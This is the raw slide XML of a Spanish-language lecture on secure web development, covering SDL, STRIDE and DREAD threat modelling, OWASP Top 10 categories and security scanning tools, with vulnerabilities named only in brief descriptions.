      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6758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5100" y="2725738"/>
            <a:ext cx="62103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Fundamentos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Exposición al usuario de referencias a objetos externos: claves primarias o nombres de ficheros</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Es necesario validar cualquier referencia a objeto privado</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Verificar autorización a todos los objetos referenciados</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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/>
              <a:t>Cuacharón</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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 bwMode="auto">
          <a:xfrm>
            <a:off x="2660650" y="1506538"/>
            <a:ext cx="6262688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ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="DC0081"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="3600" dirty="0" err="1">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Others</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="36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Vulnerabilidades</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70660" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2801938" y="1487488"/>
            <a:ext cx="6021387" cy="4665662"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7066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0025" y="2655888"/>
            <a:ext cx="62103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Otras vulnerabilidades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Visualización de información de errores al usuario cuando navega o manipula información</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Envío de información “sensible” en las cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Identificadores de Sesión muy cortos o predecibles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Protección a nivel de página (ASP, PHP, JSP) y no a nivel de carpetas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Google hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Indexación de bases de datos, carpetas o documentos que no debería accederse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="es-E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Auditorias automáticas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7270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9375" y="1274763"/>
            <a:ext cx="6669088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Securizar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> la Red</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="3 Imagen" descr="mit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081" y="1354272"/>
            <a:ext cx="5791200" cy="2943225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="4 Imagen" descr="stop-syn-flood-attack-800X8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38786" y="3343736"/>
            <a:ext cx="2180844" cy="2738628"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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Securizar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> el Servidor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="3 Imagen" descr="a8046d5c09387c374164e0ba3c4c755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8819" y="2595503"/>
            <a:ext cx="5955556" cy="3923810"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="6 Imagen" descr="fax-logo-30-1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250" y="3705427"/>
            <a:ext cx="2209800" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="8 Imagen" descr="saf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49540" y="1614156"/>
            <a:ext cx="2238688" cy="400106"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="9 Imagen" descr="Nmap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2918" y="4254217"/>
            <a:ext cx="2117089" cy="1640744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="10 Imagen" descr="retin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40356" y="1098123"/>
            <a:ext cx="1276528" cy="1276528"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="12 Imagen" descr="nessu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9552" y="1529361"/>
            <a:ext cx="1581371" cy="158137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Securiza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> tu aplicación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3660" y="1487488"/>
            <a:ext cx="7821038" cy="4665662"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Problemas del Desarrollador</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>El que defiende tiene que defender todos los puntos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>El atacante puede seleccionar el mas débil</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>El defensor sólo puede defenderse de ataques conocidos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>El atacante puede probar nuevas formas de ataque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>El defensor debe de estar en constante estado de alerta</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>El atacante golpea a voluntad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>El defensor debe jugar según las reglas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>El atacante puede jugar sucio</a:t>
            </a:r>
          </a:p>
          <a:p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044757" y="6160320"/>
            <a:ext cx="5612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Writing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Secure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: Michael Howard and David </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>LeBlanc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Ciclo de desarrollo seguro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 4" descr="C:\Users\Chad\Briefcase\SDL Threat Modeling\Logo\SDL Process Template Logo h cl.png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20827" y="1344253"/>
            <a:ext cx="5840083" cy="1095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" descr="SDL_Lifecycle_(Expanded)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679" y="2965467"/>
            <a:ext cx="7869198" cy="1178515"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="10 Rectángulo"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2140085" y="5902777"/>
            <a:ext cx="7003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http://download.microsoft.com/download/F/2/0/F205C451-C59C-4DC7-8377-9535D0A208EC/Microsoft%20SDL_Version%205.0.docx</a:t>
            </a:r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525294" y="4474723"/>
            <a:ext cx="7140102" cy="1381328"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>SD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" baseline="30000" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>+C: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Seguro por </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>iseño, Seguro por </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>efecto, Seguro en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>espliegue y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>omunicaciones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Ciclo de desarrollo seguro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044757" y="6160320"/>
            <a:ext cx="5612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http://www.microsoft.com/security/portal/Threat/SIR.aspx</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3604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423" y="1206231"/>
            <a:ext cx="8722482" cy="4823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gm061809_fig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18862" y="1255003"/>
            <a:ext cx="4233575" cy="253878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Ciclo de desarrollo seguro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729339" y="2840477"/>
            <a:ext cx="7188976" cy="239300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Identificar los activos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Crear información general sobre la arquitectura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Descomponer la aplicación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Identificar las amenazas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Documentar las amenazas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Clasificar las amenazas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3471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654" y="1489952"/>
            <a:ext cx="7127030" cy="84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1468876" y="5866178"/>
            <a:ext cx="7169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http://download.microsoft.com/download/E/5/3/E5318D25-7AEF-4A66-A147-81BBA727F2C1/SDLTM.msi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0213" y="0"/>
            <a:ext cx="8713787" cy="919163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Agenda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>
          <a:xfrm>
            <a:off x="658813" y="1681163"/>
            <a:ext cx="7799387" cy="6186309"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="341313" indent="-341313" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mitos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="341313" indent="-341313" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Fundamentos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segura</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="744538" lvl="1" indent="-341313" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pP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seguro</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="341313" indent="-341313" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Vulnerabilidades</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="744538" lvl="1" indent="-341313" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>OWASP TOP 10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="744538" lvl="1" indent="-341313" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Cross </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="744538" lvl="1" indent="-341313" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Flaws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Injections</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="744538" lvl="1" indent="-341313" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>File</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Execution</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="744538" lvl="1" indent="-341313" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Direct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Reference</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="744538" lvl="1" indent="-341313" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Others</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="744538" lvl="1" indent="-341313" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="744538" lvl="1" indent="-341313" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="630238" lvl="1" indent="-287338" eaLnBrk="1" hangingPunct="1"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amenaza STRIDE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Amenaza según el modelo STRIDE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" err="1"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>poofing</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" err="1"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>ampering</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" err="1"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>epudiation</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" err="1"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>nformation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Disclosure</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" err="1"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>enial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Service</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" err="1"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>levation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>privileges</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Evaluación del riesgo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Riesgo = Probabilidad * Daños potenciales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amenaza STRIDE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Medición de los parámetros de forma objetiva</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>DREAD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>año potencial</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Facilidad de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>eproducción</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Capacidades de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>xplotación</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Usuarios </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>fectados</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Dificultad para su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>escubrimiento</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES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Ciclo de desarrollo seguro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="346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4596" y="1511942"/>
            <a:ext cx="6517532" cy="4053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4 Rectángulo"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1624519" y="6121410"/>
            <a:ext cx="5846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http://www.cert.org/research/2009research-report.pdf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="5 Imagen" descr="ce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8815" y="5757804"/>
            <a:ext cx="1095528" cy="82879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Ciclo de desarrollo seguro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="3 Imagen" descr="fxcop-playmobil.jp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7669" y="3752371"/>
            <a:ext cx="1901582" cy="2773549"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="4 Imagen" descr="logo.gif">
            <a:hlinkClick r:id="rId4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93079" y="1547912"/>
            <a:ext cx="3281770" cy="845091"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="6 Imagen" descr="logo.png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5313" y="5756544"/>
            <a:ext cx="3632982" cy="371880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="7 Imagen" descr="logo.png">
            <a:hlinkClick r:id="rId8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4899" y="1504728"/>
            <a:ext cx="2488889" cy="774603"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="8 Imagen" descr="coverity-logo.gif">
            <a:hlinkClick r:id="rId10"/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1423" y="4415343"/>
            <a:ext cx="3194393" cy="681949"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="10 Imagen" descr="180px-NIST_logo.gif">
            <a:hlinkClick r:id="rId12"/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43553" y="2795992"/>
            <a:ext cx="2190750" cy="1304925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="11 Imagen" descr="ibm_logo.png">
            <a:hlinkClick r:id="rId14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4180" y="2907151"/>
            <a:ext cx="2214663" cy="89140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Ciclo de desarrollo seguro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500008" y="6043589"/>
            <a:ext cx="6099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http://msdn.microsoft.com/en-us/library/aa302335.aspx</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="348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128" y="1347888"/>
            <a:ext cx="4763817" cy="133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4311" y="3020135"/>
            <a:ext cx="66008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OWASP Top 10 2007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01713" y="1303338"/>
            <a:ext cx="7027862" cy="1535112"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" defTabSz="449263" eaLnBrk="1" hangingPunct="1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SzPct val="37000"/>
              <a:buFont typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000"/>
              <a:t>	[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0"/>
              <a:t>OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000"/>
              <a:t>] - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" i="1"/>
              <a:t>“There are at least 300 issues that affect the overall security of a web application. These 300+ issues are detailed in the OWASP Guide, which is essential reading for anyone developing web applications today.“</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14340" name="Picture 7" descr="650px-Top_10_2007-MitreDataCh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750" y="2647950"/>
            <a:ext cx="61912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OWASP Top 10 2010</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="342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740" y="1631512"/>
            <a:ext cx="8441029" cy="4672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921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OWASP Top 10 2010</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1232960" name="Group 64"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph type="tbl" idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="788988" y="1320800"/>
          <a:ext cx="7491412" cy="4407408"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="196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6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hlinkClick r:id="rId3" tooltip="Top 10 2007-A1"/>
                        </a:rPr>
                        <a:t>Cross Site Scripting (XSS)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La aplicación envía datos proporcionados por el usuario directamente al navegador sin comprobarlos. Robos de Sesión, phising, automatización de tareas, etc…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hlinkClick r:id="rId4" tooltip="Top 10 2007-A2"/>
                        </a:rPr>
                        <a:t>Injection Flaws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 usuario envía comandos para interrogar al interprete que esta detrás. SQL Injection, XPath Injection, LDAP Injection,…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hlinkClick r:id="rId5" tooltip="Top 10 2007-A3"/>
                        </a:rPr>
                        <a:t>Malicious File Execution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Código vulnerable a la inclusión de archivo (RFI) permite a los atacantes incluir código, lo que resulta en ataques devastadores, como el compromiso total del Servidor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hlinkClick r:id="rId6" tooltip="Top 10 2007-A4"/>
